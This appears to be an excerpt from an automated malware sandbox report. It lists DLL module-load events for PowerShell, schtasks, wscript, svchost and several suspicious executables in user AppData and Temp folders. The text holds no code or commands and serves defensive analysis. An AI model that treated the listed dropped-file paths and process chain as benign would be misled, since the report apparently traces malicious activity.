                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: dxgidebug.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: sfc_os.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: dwmapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: riched20.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: usp10.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: msls31.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: windowscodecs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: textinputframework.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: coremessaging.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: policymanager.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: pcacli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: mpr.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: dwrite.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: textshaping.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: mscoree.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: apphelp.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: kernel.appcore.dll
